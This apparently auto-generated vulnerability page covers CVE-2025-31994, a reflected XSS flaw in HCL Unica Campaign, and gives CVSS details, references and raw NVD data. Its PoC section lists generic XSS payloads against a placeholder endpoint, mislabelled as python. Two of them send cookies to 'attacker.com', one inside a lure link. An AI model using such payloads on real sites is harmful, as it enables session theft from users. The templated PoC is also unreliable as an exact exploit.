CVE-2025-31994

Description

HCL Unica Campaign 12.1.10 is vulnerable to Reflected Cross-Site Scripting (XSS) where an attacker injects malicious script into an HTTP request, which is then reflected unsafely in the server's immediate response to the victim's browser, executing the script as if it originated from the trusted website.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

HCL Unica Campaign 12.1.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-31994 PoC: Reflected XSS in HCL Unica Campaign 12.1.10 -->
<!-- Attack vector: Inject malicious script via HTTP request parameter, reflected in server response -->

<!-- Example 1: Basic script injection via URL parameter -->
https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<script>alert(document.cookie)</script>

<!-- Example 2: Using img tag with onerror event handler -->
https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<img src=x onerror=alert(document.domain)>

<!-- Example 3: Using svg tag with onload event -->
https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<svg/onload=alert('XSS')>

<!-- Example 4: Cookie exfiltration payload -->
https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Example 5: Full HTML exploitation context -->
<html>
  <body>
    <a href="https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>">
      Click here to view campaign report
    </a>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-31994
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-31994
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-31994/
[4] VulDB https://vuldb.com/cve/CVE-2025-31994
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124472

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-31994", "sourceIdentifier": "[email protected]", "published": "2025-10-13T04:15:55.927", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Unica Campaign 12.1.10 is vulnerable to Reflected Cross-Site Scripting (XSS) where an attacker injects malicious script into an HTTP request, which is then reflected unsafely in the server's immediate response to the victim's browser, executing the script as if it originated from the trusted website."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124472", "source": "[email protected]"}]}}